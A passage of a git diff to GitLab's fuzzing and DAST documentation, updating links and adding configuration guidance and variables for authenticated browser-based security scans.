fuzzing by including the CI job in your existing `.gitlab-ci.yml` file. @@ -38,7 +38,7 @@ Docker image with the fuzz engine to run your app. ## Configuration To enable fuzzing, you must -[include](../../../ci/yaml/README.md#includetemplate) +[include](../../../ci/yaml/index.md#includetemplate) the [`Coverage-Fuzzing.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/Coverage-Fuzzing.gitlab-ci.yml) provided as part of your GitLab installation. @@ -59,8 +59,8 @@ my_fuzz_target: - ./gitlab-cov-fuzz run --regression=$REGRESSION -- <your fuzz target> ``` -The included template makes available the [hidden job](../../../ci/yaml/README.md#hide-jobs) -`.fuzz_base`, which you must [extend](../../../ci/yaml/README.md#extends) for each of your fuzz +The included template makes available the [hidden job](../../../ci/yaml/index.md#hide-jobs) +`.fuzz_base`, which you must [extend](../../../ci/yaml/index.md#extends) for each of your fuzz targets. Each fuzz target **must** have a separate job. For example, the [go-fuzzing-example project](https://gitlab.com/gitlab-org/security-products/demos/go-fuzzing-example) contains one job that extends `.fuzz_base` for its single fuzz target. @@ -192,7 +192,7 @@ To use coverage fuzzing in an offline environment, follow these steps: ### Continuous fuzzing (long-running asynchronous fuzzing jobs) It's also possible to run the fuzzing jobs longer and without blocking your main pipeline. This -configuration uses the GitLab [parent-child pipelines](../../../ci/parent_child_pipelines.md). +configuration uses the GitLab [parent-child pipelines](../../../ci/pipelines/parent_child_pipelines.md). The full example is available in the [repository](https://gitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example/-/tree/continuous_fuzzing#running-go-fuzz-from-ci). This example uses Go, but is applicable for any other supported languages. diff --git a/doc/user/application_security/dast/browser_based.md b/doc/user/application_security/dast/browser_based.md index 072f6fba4ba..1288db21880 100644 --- a/doc/user/application_security/dast/browser_based.md +++ b/doc/user/application_security/dast/browser_based.md @@ -21,7 +21,7 @@ Crawling continues by taking more snapshots and finding subsequent actions. The benefit of crawling by following user actions in a browser is that the crawler can interact with the target application much like a real user would, identifying complex flows that traditional web crawlers don’t understand. This results in better coverage of the website. -Scanning a web application with both the browser-based crawler and GitLab DAST should provide greater coverage, compared with only GitLab DAST. The new crawler does not support API scanning or the DAST AJAX crawler. +Using the browser-based crawler should provide greater coverage for most web applications, compared with the current DAST AJAX crawler. The new crawler replaces the AJAX crawler and is specifically designed to maximize crawl coverage in modern web applications. While both crawlers are currently used in conjunction with the existing DAST scanner, the combination of the browser-based crawler with the current DAST scanner is much more effective at finding and testing every page in an application. ## Enable browser-based crawler @@ -63,8 +63,8 @@ The browser-based crawler can be configured using CI/CD variables. The [DAST variables](index.md#available-cicd-variables) `SECURE_ANALYZERS_PREFIX`, `DAST_FULL_SCAN_ENABLED`, `DAST_AUTO_UPDATE_ADDONS`, `DAST_EXCLUDE_RULES`, `DAST_REQUEST_HEADERS`, `DAST_HTML_REPORT`, `DAST_MARKDOWN_REPORT`, `DAST_XML_REPORT`, `DAST_AUTH_URL`, `DAST_USERNAME`, `DAST_PASSWORD`, `DAST_USERNAME_FIELD`, `DAST_PASSWORD_FIELD`, `DAST_FIRST_SUBMIT_FIELD`, `DAST_SUBMIT_FIELD`, `DAST_EXCLUDE_URLS`, `DAST_AUTH_VERIFICATION_URL`, `DAST_BROWSER_AUTH_VERIFICATION_SELECTOR`, `DAST_BROWSER_AUTH_VERIFICATION_LOGIN_FORM`, `DAST_BROWSER_AUTH_REPORT`, -`DAST_INCLUDE_ALPHA_VULNERABILITIES`, `DAST_PATHS_FILE`, `DAST_PATHS`, `DAST_ZAP_CLI_OPTIONS`, and `DAST_ZAP_LOG_CONFIGURATION` are also compatible with browser-based crawler scans. - +`DAST_INCLUDE_ALPHA_VULNERABILITIES`, `DAST_PATHS_FILE`, `DAST_PATHS`, `DAST_ZAP_CLI_OPTIONS`, and `DAST_ZAP_LOG_CONFIGURATION` are also compatible with browser-based crawler scans. + ## Vulnerability detection While the browser-based crawler crawls modern web applications efficiently, vulnerability detection is still managed by the standard DAST/Zed Attack Proxy (ZAP) solution. diff --git a/doc/user/application_security/dast/img/dast_auth_browser_scan_highlight.png b/doc/user/application_security/dast/img/dast_auth_browser_scan_highlight.png Binary files differindex 132c9f9c991..3369956a5ed 100644 --- a/doc/user/application_security/dast/img/dast_auth_browser_scan_highlight.png +++ b/doc/user/application_security/dast/img/dast_auth_browser_scan_highlight.png diff --git a/doc/user/application_security/dast/img/dast_auth_browser_scan_search_elements.png b/doc/user/application_security/dast/img/dast_auth_browser_scan_search_elements.png Binary files differindex 4e1dca626bc..34e7a2e4ab4 100644 --- a/doc/user/application_security/dast/img/dast_auth_browser_scan_search_elements.png +++ b/doc/user/application_security/dast/img/dast_auth_browser_scan_search_elements.png diff --git a/doc/user/application_security/dast/index.md b/doc/user/application_security/dast/index.md index 675d01373d4..4b10f03fec3 100644 --- a/doc/user/application_security/dast/index.md +++ b/doc/user/application_security/dast/index.md @@ -50,7 +50,7 @@ results. On failure, the analyzer outputs an ## Prerequisites -- [GitLab Runner](../../../ci/runners/README.md) available, with the +- [GitLab Runner](../../../ci/runners/index.md) available, with the [`docker` executor](https://docs.gitlab.com/runner/executors/docker.html). - Target application deployed. For more details, read [Deployment options](#deployment-options). @@ -145,6 +145,7 @@ To enable DAST to run automatically, either: by [Auto DevOps](../../../topics/autodevops/index.md)). - [Include the DAST template](#include-the-dast-template) in your existing `.gitlab-ci.yml` file. +- [Configure DAST using the UI](#configure-dast-using-the-ui). ### DAST job order @@ -202,7 +203,7 @@ To include the DAST template: 1. Add the template to GitLab, based on your version of GitLab: - - In GitLab 11.9 and later, [include](../../../ci/yaml/README.md#includetemplate) + - In GitLab 11.9 and later, [include](../../../ci/yaml/index.md#includetemplate) the template by adding the following to your `.gitlab-ci.yml` file: ```yaml @@ -218,7 +219,7 @@ To include the DAST template: 1. Define the URL to be scanned by DAST by using one of these methods: - - Set the `DAST_WEBSITE` [CI/CD variable](../../../ci/yaml/README.md#variables). + - Set the `DAST_WEBSITE` [CI/CD variable](../../../ci/yaml/index.md#variables). If set, this value takes precedence. - Add the URL in an `environment_url.txt` file at the root of your project. This is @@ -247,10 +248,10 @@ The included template creates a `dast` job in your CI/CD pipeline and scans your project's running application for possible vulnerabilities. The results are saved as a -[DAST report artifact](../../../ci/yaml/README.md#artifactsreportsdast) +[DAST report artifact](../../../ci/yaml/index.md#artifactsreportsdast) that you can later download and analyze. Due to implementation limitations, we always take the latest DAST artifact available. Behind the scenes, the -[GitLab DAST Docker image](https://gitlab.com/gitlab-org/security-products/dast) +[GitLab DAST Docker image](https://gitlab.com/security-products/dast) is used to run the tests on the specified URL and scan it for possible vulnerabilities. @@ -262,9 +263,31 @@ image. Using the `DAST_VERSION` variable, you can choose how DAST updates: - Only update fixes by pinning to a minor version (such as `1.6`). - Prevent all updates by pinning to a specific version (such as `1.6.4`). -Find the latest DAST versions on the [Releases](https://gitlab.com/gitlab-org/security-products/dast/-/releases) +Find the latest DAST versions on the [Releases](https://gitlab.com/security-products/dast/-/releases) page. +#### Configure DAST using the UI + +You can enable or configure DAST settings using the UI. The generated settings are formatted so they +can be conveniently pasted into the `.gitlab-ci.yml` file. + +1. From the project's home page, go to **Security & Compliance > Configuration**. +1. In the **Dynamic Application Security Testing (DAST)** section, select **Enable DAST** or + **Configure DAST**. +1. Select the desired **Scanner profile**, or select **Create scanner profile** and save a + scanner profile. For more details, see [scanner profiles](#scanner-profile). +1. Select the desired **Site profile**, or select **Create site profile** and save a site + profile. For more details, see [site profiles](#site-profile). +1. Select **Generate code snippet**. A modal opens with the YAML snippet corresponding to the + options you selected. +1. Do one of the following: + 1. Select **Copy code only** to copy the snippet to your clipboard. + 1. Select **Copy code and open `.gitlab-ci.yml` file** to copy the snippet to your clipboard. The + CI/CD Editor then opens. + 1. Paste the snippet into the `.gitlab-ci.yml` file. + 1. Select the **Lint** tab to confirm the edited `.gitlab-ci.yml` file is valid. + 1. Select **Commit changes**. + #### Crawling web applications dependent on JavaScript GitLab has released a new browser-based crawler, an add-on to DAST that uses a browser to crawl web applications for content. This crawler replaces the standard DAST Spider and Ajax Crawler, and uses the same authentication mechanisms as a normal DAST scan. @@ -487,11 +510,11 @@ To view details of vulnerabilities detected by DAST: ### Customizing the DAST settings WARNING: -Beginning in GitLab 13.0, the use of [`only` and `except`](../../../ci/yaml/README.md#only--except) -is no longer supported. When overriding the template, you must use [`rules`](../../../ci/yaml/README.md#rules) instead. +Beginning in GitLab 13.0, the use of [`only` and `except`](../../../ci/yaml/index.md#only--except) +is no longer supported. When overriding the template, you must use [`rules`](../../../ci/yaml/index.md#rules) instead. The DAST settings can be changed through CI/CD variables by using the -[`variables`](../../../ci/yaml/README.md#variables) parameter in `.gitlab-ci.yml`. +[`variables`](../../../ci/yaml/index.md#variables) parameter in `.gitlab-ci.yml`. These variables are documented in [available variables](#available-cicd-variables). For example: @@ -505,7 +528,7 @@ variables: DAST_SPIDER_MINS: 120 ``` -Because the template is [evaluated before](../../../ci/yaml/README.md#include) the pipeline +Because the template is [evaluated before](../../../ci/yaml/index.md#include) the pipeline configuration, the last mention of the variable takes precedence. #### Enabling and disabling rules @@ -523,7 +546,7 @@ DAST scan with both configured exits with an error. By default, several rules are disabled because they either take a long time to run or frequently generate false positives. The complete list of disabled rules -can be found in [exclude_rules.yml](https://gitlab.com/gitlab-org/security-products/dast/-/blob/master/src/config/exclude_rules.yml). +can be found in [exclude_rules.yml](https://gitlab.com/gitlab-org/security-products/dast/-/blob/main/src/config/exclude_rules.yml). ### Hide sensitive information @@ -550,7 +573,7 @@ you periodically confirm the scanner's authentication is still working, as this time due to authentication changes to the application. Create masked CI/CD variables to pass the credentials that DAST uses. -To create masked variables for the username and password, see [Create a custom variable in the UI](../../../ci/variables/README.md#custom-cicd-variables). +To create masked variables for the username and password, see [Create a custom variable in the UI](../../../ci/variables/index.md#custom-cicd-variables). The key of the username variable must be `DAST_USERNAME`, and the key of the password variable must be `DAST_PASSWORD`. @@ -570,6 +593,7 @@ dast: variables: DAST_WEBSITE: "https://example.com" DAST_AUTH_URL: "https://login.example.com/" + DAST_BROWSER_PATH_TO_LOGIN_FORM: "css:.navigation-menu,css:.login-menu-item" # optional list of selectors that should be clicked on prior to attempting to input username/password into the sign-in HTML form DAST_USERNAME: "admin" DAST_PASSWORD: "P@55w0rd!" DAST_USERNAME_FIELD: "name:username" # a selector describing the element containing the username field at the sign-in HTML form @@ -646,7 +670,7 @@ dast: DAST_WEBSITE: "https://example.com" ... DAST_AUTH_VERIFICATION_URL: "https://example.com/user/welcome" -``` +``` #### Verify based on presence of an element @@ -664,7 +688,7 @@ dast: DAST_WEBSITE: "https://example.com" ... DAST_AUTH_VERIFICATION_SELECTOR: "css:.welcome-user" -``` +``` #### Verify based on presence of a login form @@ -682,7 +706,38 @@ dast: DAST_WEBSITE: "https://example.com" ... DAST_AUTH_VERIFICATION_LOGIN_FORM: "true" -``` +``` + +### View the login form + +Many web applications show the user the login form in a pop-up (modal) window. +For these applications, navigating to the form requires both: + +- A starting URL. +- A list of elements to click to display the modal window. + +When `DAST_BROWSER_PATH_TO_LOGIN_FORM` is present, like in this example: + +```yaml +include: + - template: DAST.gitlab-ci.yml + +dast: + variables: + DAST_WEBSITE: "https://my.site.com" + ... + DAST_AUTH_URL: "https://my.site.com/admin" + DAST_BROWSER_PATH_TO_LOGIN_FORM: "css:.navigation-menu,css:.login-menu-item" +``` + +DAST performs these actions: + +1. Load the `DAST_AUTH_URL` page, such as `https://my.site.com/admin`. +1. After the page loads, DAST selects elements found by the selectors described + in `DAST_BROWSER_PATH_TO_LOGIN_FORM`. This example opens the navigation menu + and selects the login menu, to display the login modal window. +1. To continue the authentication process, DAST fills in the username and password + on the login form. ### Configure the authentication debug output @@ -702,55 +757,60 @@ dast: DAST_AUTH_REPORT: "true" artifacts: paths: [gl-dast-debug-auth-report.html] + when: always ``` ### Available CI/CD variables -DAST can be [configured](#customizing-the-dast-settings) using CI/CD variables. - -| CI/CD variable | Type | Description | -|:--------------------------------------------|:--------------|:-----------------------------------| -| `SECURE_ANALYZERS_PREFIX` | URL | Set the Docker registry base address from which to download the analyzer. | -| `DAST_WEBSITE` (**1**) | URL | The URL of the website to scan. `DAST_API_OPENAPI` must be specified if this is omitted. | -| `DAST_API_OPENAPI` | URL or string | The API specification to import. The specification can be hosted at a URL, or the name of a file present in the `/zap/wrk` directory. `DAST_WEBSITE` must be specified if this is omitted. | -| `DAST_API_SPECIFICATION` (**1**) | URL or string | [Deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/290241) in GitLab 13.12 and replaced by `DAST_API_OPENAPI`. To be removed in GitLab 15.0. The API specification to import. The specification can be hosted at a URL, or the name of a file present in the `/zap/wrk` directory. `DAST_WEBSITE` must be specified if this is omitted. | -| `DAST_SPIDER_START_AT_HOST` | boolean | Set to `false` to prevent DAST from resetting the target to its host before scanning. When `true`, non-host targets `http://test.site/some_path` is reset to `http://test.site` before scan. Default: `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/258805) in GitLab 13.6. | -| `DAST_AUTH_URL` (**1**) | URL | The URL of the page containing the sign-in HTML form on the target website. `DAST_USERNAME` and `DAST_PASSWORD` are submitted with the login form to create an authenticated scan. Not supported for API scans. | -| `DAST_AUTH_VERIFICATION_URL` (**1**) | URL | A URL only accessible to logged in users that DAST can use to confirm successful authentication. If provided, DAST exits if it cannot access the URL. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207335) in GitLab 13.8. | -| `DAST_USERNAME` (**1**) | string | The username to enter into the username field on the sign-in HTML form. | -| `DAST_PASSWORD` (**1**) | string | The password to enter into the password field on the sign-in HTML form. | -| `DAST_USERNAME_FIELD` (**1**) | selector | A selector describing the username field on the sign-in HTML form. Example: `id:user` | -| `DAST_PASSWORD_FIELD` (**1**) | selector | A selector describing the password field on the sign-in HTML form. Example: `css:.password-field` | -| `DAST_SKIP_TARGET_CHECK` | boolean | Set to `true` to prevent DAST from checking that the target is available before scanning. Default: `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/229067) in GitLab 13.8. | -| `DAST_MASK_HTTP_HEADERS` | string | Comma-separated list of request and response headers to be masked (GitLab 13.1). Must contain **all** headers to be masked. Refer to [list of headers that are masked by default](#hide-sensitive-information). | -| `DAST_EXCLUDE_URLS` (**1**) | URLs | The URLs to skip during the authenticated scan; comma-separated. Regular expression syntax can be used to match multiple URLs. For example, `.*` matches an arbitrary character sequence. Not supported for API scans. | -| `DAST_FULL_SCAN_ENABLED` (**1**) | boolean | Set to `true` to run a [ZAP Full Scan](https://github.com/zaproxy/zaproxy/wiki/ZAP-Full-Scan) instead of a [ZAP Baseline Scan](https://github.com/zaproxy/zaproxy/wiki/ZAP-Baseline-Scan). Default: `false` | -| `DAST_AUTO_UPDATE_ADDONS` | boolean | ZAP add-ons are pinned to specific versions in the DAST Docker image. Set to `true` to download the latest versions when the scan starts. Default: `false` | -| `DAST_API_HOST_OVERRIDE` (**1**) | string | Used to override domains defined in API specification files. Only supported when importing the API specification from a URL. Example: `example.com:8080` | -| `DAST_EXCLUDE_RULES` | string | Set to a comma-separated list of Vulnerability Rule IDs to exclude them from running during the scan. Rule IDs are numbers and can be found from the DAST log or on the [ZAP project](https://www.zaproxy.org/docs/alerts/). For example, `HTTP Parameter Override` has a rule ID of `10026`. Cannot be used when `DAST_ONLY_INCLUDE_RULES` is set. **Note:** In earlier versions of GitLab the excluded rules were executed but vulnerabilities they generated were suppressed. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/118641) in GitLab 12.10. | -| `DAST_ONLY_INCLUDE_RULES` | string | Set to a comma-separated list of Vulnerability Rule IDs to configure the scan to run only them. Rule IDs are numbers and can be found from the DAST log or on the [ZAP project](https://www.zaproxy.org/docs/alerts/). Cannot be used when `DAST_EXCLUDE_RULES` is set. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/250651) in GitLab 13.12. | -| `DAST_REQUEST_HEADERS` (**1**) | string | Set to a comma-separated list of request header names and values. Headers are added to every request made by DAST. For example, `Cache-control: no-cache,User-Agent: DAST/1.0` | -| `DAST_DEBUG` (**1**) | boolean | Enable debug message output. Default: `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | -| `DAST_TARGET_AVAILABILITY_TIMEOUT` (**1**) | number | Time limit in seconds to wait for target availability. -| `DAST_SPIDER_MINS` (**1**) | number | The maximum duration of the spider scan in minutes. Set to `0` for unlimited. Default: One minute, or unlimited when the scan is a full scan. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | -| `DAST_HTML_REPORT` | string | The filename of the HTML report written at the end of a scan. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | -| `DAST_MARKDOWN_REPORT` | string | The filename of the Markdown report written at the end of a scan. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | -| `DAST_XML_REPORT` | string | The filename of the XML report written at the end of a scan. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | -| `DAST_INCLUDE_ALPHA_VULNERABILITIES` | boolean | Set to `true` to include alpha passive and active scan rules. Default: `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | -| `DAST_USE_AJAX_SPIDER` (**1**) | boolean | Set to `true` to use the AJAX spider in addition to the traditional spider, useful for crawling sites that require JavaScript. Default: `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | -| `DAST_PATHS` | string | Set to a comma-separated list of URLs for DAST to scan. For example, `/page1.html,/category1/page3.html,/page2.html`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/214120) in GitLab 13.4. | -| `DAST_PATHS_FILE` | string | The file path containing the paths within `DAST_WEBSITE` to scan. The file must be plain text with one path per line. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/258825) in GitLab 13.6. | -| `DAST_SUBMIT_FIELD` | selector | A selector describing the element that when clicked submits the login form, or the password form of a multi-page login process. Example: `xpath://input[@value='Login']`. [Introduced](https://gitlab.com/gitlab-org/gitlab-ee/issues/9894) in GitLab 12.4. | -| `DAST_FIRST_SUBMIT_FIELD` | selector | A selector describing the element that when clicked submits the username form of a multi-page login process. Example: `.submit`. [Introduced](https://gitlab.com/gitlab-org/gitlab-ee/issues/9894) in GitLab 12.4. | -| `DAST_ZAP_CLI_OPTIONS` | string | ZAP server command-line options. For example, `-Xmx3072m` would set the Java maximum memory allocation pool size. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | -| `DAST_ZAP_LOG_CONFIGURATION` | string | Set to a semicolon-separated list of additional log4j properties for the ZAP Server. For example, `log4j.logger.org.parosproxy.paros.network.HttpSender=DEBUG;log4j.logger.com.crawljax=DEBUG` | -| `DAST_AGGREGATE_VULNERABILITIES` | boolean | Vulnerability aggregation is set to `true` by default. To disable this feature and see each vulnerability individually set to `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/254043) in GitLab 14.0. | -| `DAST_MAX_URLS_PER_VULNERABILITY` | number | The maximum number of URLs reported for a single vulnerability. `DAST_MAX_URLS_PER_VULNERABILITY` is set to `50` by default. To list all the URLs set to `0`. [Introduced](https://gitlab.com/gitlab-org/security-products/dast/-/merge_requests/433) in GitLab 13.12. | -| `DAST_AUTH_REPORT` | boolean | Used in combination with exporting the `gl-dast-debug-auth-report.html` artifact to aid in debugging authentication issues. | -| `DAST_AUTH_VERIFICATION_SELECTOR` | selector | Verifies successful authentication by checking for presence of a selector once the login form has been submitted. Example: `css:.user-photo` | -| `DAST_AUTH_VERIFICATION_LOGIN_FORM` | boolean | Verifies successful authentication by checking for the lack of a login form once the login form has been submitted. | - -1. DAST CI/CD variable available to an on-demand scan. +You can use CI/CD variables to customize DAST. + +| CI/CD variable | Type | Description | +|:------------------------------------------------|:--------------|:-------------------------------| +| `SECURE_ANALYZERS_PREFIX` | URL | Set the Docker registry base address from which to download the analyzer. | +| `DAST_WEBSITE` <sup>1</sup> | URL | The URL of the website to scan. `DAST_API_OPENAPI` must be specified if this is omitted. | +| `DAST_API_OPENAPI` | URL or string | The API specification to import. The specification can be hosted at a URL, or the name of a file present in the `/zap/wrk` directory. `DAST_WEBSITE` must be specified if this is omitted. | +| `DAST_API_SPECIFICATION` <sup>1</sup> | URL or string | [Deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/290241) in GitLab 13.12 and replaced by `DAST_API_OPENAPI`. To be removed in GitLab 15.0. The API specification to import. The specification can be hosted at a URL, or the name of a file present in the `/zap/wrk` directory. `DAST_WEBSITE` must be specified if this is omitted. | +| `DAST_SPIDER_START_AT_HOST` | boolean | Set to `false` to prevent DAST from resetting the target to its host before scanning. When `true`, non-host targets `http://test.site/some_path` is reset to `http://test.site` before scan. Default: `true`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/258805) in GitLab 13.6. | +| `DAST_AUTH_URL` <sup>1</sup> | URL | The URL of the page containing the sign-in HTML form on the target website. `DAST_USERNAME` and `DAST_PASSWORD` are submitted with the login form to create an authenticated scan. Not supported for API scans. | +| `DAST_BROWSER_PATH_TO_LOGIN_FORM` <sup>1</sup> | selector | Comma-separated list of selectors that will be clicked on prior to attempting to enter `DAST_USERNAME` and `DAST_PASSWORD` into the login form. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/326633) in GitLab 14.1. | +| `DAST_USERNAME` <sup>1</sup> | string | The username to authenticate to in the website. | +| `DAST_PASSWORD` <sup>1</sup> | string | The password to authenticate to in the website. | +| `DAST_USERNAME_FIELD` <sup>1</sup> | string | The name of username field at the sign-in HTML form. | +| `DAST_PASSWORD_FIELD` <sup>1</sup> | string | The name of password field at the sign-in HTML form. | +| `DAST_SKIP_TARGET_CHECK` | boolean | Set to `true` to prevent DAST from checking that the target is available before scanning. Default: `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/229067) in GitLab 13.8. | +| `DAST_MASK_HTTP_HEADERS` | string | Comma-separated list of request and response headers to be masked (GitLab 13.1). Must contain **all** headers to be masked. Refer to [list of headers that are masked by default](#hide-sensitive-information). | +| `DAST_EXCLUDE_URLS` <sup>1</sup> | URLs | The URLs to skip during the authenticated scan; comma-separated. Regular expression syntax can be used to match multiple URLs. For example, `.*` matches an arbitrary character sequence. Not supported for API scans. | +| `DAST_FULL_SCAN_ENABLED` <sup>1</sup> | boolean | Set to `true` to run a [ZAP Full Scan](https://github.com/zaproxy/zaproxy/wiki/ZAP-Full-Scan) instead of a [ZAP Baseline Scan](https://github.com/zaproxy/zaproxy/wiki/ZAP-Baseline-Scan). Default: `false` | +| `DAST_FULL_SCAN_DOMAIN_VALIDATION_REQUIRED` | boolean | **{warning}** **[Removed](https://gitlab.com/gitlab-org/gitlab/-/issues/293595)** in GitLab 14.0. Set to `true` to require domain validation when running DAST full scans. Not supported for API scans. Default: `false` | +| `DAST_AUTO_UPDATE_ADDONS` | boolean | ZAP add-ons are pinned to specific versions in the DAST Docker image. Set to `true` to download the latest versions when the scan starts. Default: `false` | +| `DAST_API_HOST_OVERRIDE` <sup>1</sup> | string | Used to override domains defined in API specification files. Only supported when importing the API specification from a URL. Example: `example.com:8080` | +| `DAST_EXCLUDE_RULES` | string | Set to a comma-separated list of Vulnerability Rule IDs to exclude them from running during the scan. Rule IDs are numbers and can be found from the DAST log or on the [ZAP project](https://www.zaproxy.org/docs/alerts/). For example, `HTTP Parameter Override` has a rule ID of `10026`. Cannot be used when `DAST_ONLY_INCLUDE_RULES` is set. **Note:** In earlier versions of GitLab the excluded rules were executed but vulnerabilities they generated were suppressed. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/118641) in GitLab 12.10. | +| `DAST_ONLY_INCLUDE_RULES` | string | Set to a comma-separated list of Vulnerability Rule IDs to configure the scan to run only them. Rule IDs are numbers and can be found from the DAST log or on the [ZAP project](https://www.zaproxy.org/docs/alerts/). Cannot be used when `DAST_EXCLUDE_RULES` is set. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/250651) in GitLab 13.12. | +| `DAST_REQUEST_HEADERS` <sup>1</sup> | string | Set to a comma-separated list of request header names and values. Headers are added to every request made by DAST. For example, `Cache-control: no-cache,User-Agent: DAST/1.0` | +| `DAST_DEBUG` <sup>1</sup> | boolean | Enable debug message output. Default: `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | +| `DAST_TARGET_AVAILABILITY_TIMEOUT` <sup>1</sup> | number | Time limit in seconds to wait for target availability. | +| `DAST_SPIDER_MINS` <sup>1</sup> | number | The maximum duration of the spider scan in minutes. Set to `0` for unlimited. Default: One minute, or unlimited when the scan is a full scan. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | +| `DAST_HTML_REPORT` | string | The filename of the HTML report written at the end of a scan. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | +| `DAST_MARKDOWN_REPORT` | string | The filename of the Markdown report written at the end of a scan. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | +| `DAST_XML_REPORT` | string | The filename of the XML report written at the end of a scan. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | +| `DAST_INCLUDE_ALPHA_VULNERABILITIES` | boolean | Set to `true` to include alpha passive and active scan rules. Default: `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | +| `DAST_USE_AJAX_SPIDER` <sup>1</sup> | boolean | Set to `true` to use the AJAX spider in addition to the traditional spider, useful for crawling sites that require JavaScript. Default: `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | +| `DAST_PATHS` | string | Set to a comma-separated list of URLs for DAST to scan. For example, `/page1.html,/category1/page3.html,/page2.html`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/214120) in GitLab 13.4. | +| `DAST_PATHS_FILE` | string | The file path containing the paths within `DAST_WEBSITE` to scan. The file must be plain text with one path per line. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/258825) in GitLab 13.6. | +| `DAST_SUBMIT_FIELD` | string | The `id` or `name` of the element that when clicked submits the login form or the password form of a multi-page login process. [Introduced](https://gitlab.com/gitlab-org/gitlab-ee/issues/9894) in GitLab 12.4. | +| `DAST_FIRST_SUBMIT_FIELD` | string | The `id` or `name` of the element that when clicked submits the username form of a multi-page login process. [Introduced](https://gitlab.com/gitlab-org/gitlab-ee/issues/9894) in GitLab 12.4. | +| `DAST_ZAP_CLI_OPTIONS` | string | ZAP server command-line options. For example, `-Xmx3072m` would set the Java maximum memory allocation pool size. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12652) in GitLab 13.1. | +| `DAST_ZAP_LOG_CONFIGURATION` | string | Set to a semicolon-separated list of additional log4j properties for the ZAP Server. For example, `log4j.logger.org.parosproxy.paros.network.HttpSender=DEBUG;log4j.logger.com.crawljax=DEBUG` | +| `DAST_AUTH_EXCLUDE_URLS` | URLs | **{warning}** **[Removed](https://gitlab.com/gitlab-org/gitlab/-/issues/289959)** in GitLab 14.0. Replaced by `DAST_EXCLUDE_URLS`. The URLs to skip during the authenticated scan; comma-separated. Regular expression syntax can be used to match multiple URLs. For example, `.*` matches an arbitrary character sequence. Not supported for API scans. | +| `DAST_AGGREGATE_VULNERABILITIES` | boolean | Vulnerability aggregation is set to `true` by default. To disable this feature and see each vulnerability individually set to `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/254043) in GitLab 14.0. | +| `DAST_MAX_URLS_PER_VULNERABILITY` | number | The maximum number of URLs reported for a single vulnerability. `DAST_MAX_URLS_PER_VULNERABILITY` is set to `50` by default. To list all the URLs set to `0`. [Introduced](https://gitlab.com/gitlab-org/security-products/dast/-/merge_requests/433) in GitLab 13.12. | +| `DAST_AUTH_REPORT` | boolean | Used in combination with exporting the `gl-dast-debug-auth-report.html` artifact to aid in debugging authentication issues. | +| `DAST_AUTH_VERIFICATION_URL` <sup>1</sup> | URL | A URL only accessible to logged in users that DAST can use to confirm successful authentication. If provided, DAST exits if it cannot access the URL. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207335) in GitLab 13.8. | +| `DAST_AUTH_VERIFICATION_SELECTOR` | selector | Verifies successful authentication by checking for presence of a selector once the login form has been submitted. Example: `css:.user-photo` | +| `DAST_AUTH_VERIFICATION_LOGIN_FORM` | boolean | Verifies successful authentication by checking for the lack of a login form once the login form has been submitted. | +| `DAST_ADVERTISE_SCAN` | boolean | Set to `true` to add a `Via` header to every request sent, advertising that the request was sent as part of a GitLab DAST scan. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/334947) in GitLab 14.1. | + +1. Available to an on-demand DAST scan. #### Selectors @@ -778,7 +838,8 @@ Chrome DevTools element selector tool is an effective way to find a selector.  1. Once highlighted, you can see the element's details, including attributes that would make a good candidate for a selector. -In this example, the `id="user_login"` appears to be a good candidate. You can use this as a selector as the DAST username field by setting `DAST_USERNAME_FIELD: "css:[id=user_login]"`, or more simply, `DAST_USERNAME_FIELD: "id:user_login"`. +In this example, the `id="user_login"` appears to be a good candidate. You can use this as a selector as the DAST username field by setting +`DAST_USERNAME_FIELD: "id:user_login"`. ##### Choose the right selector @@ -788,9 +849,9 @@ In order of preference, it is recommended to choose as selectors: - `id` fields. These are generally unique on a page, and rarely change. - `name` fields. These are generally unique on a page, and rarely change. -- `class` values specific to the field, such as the selector 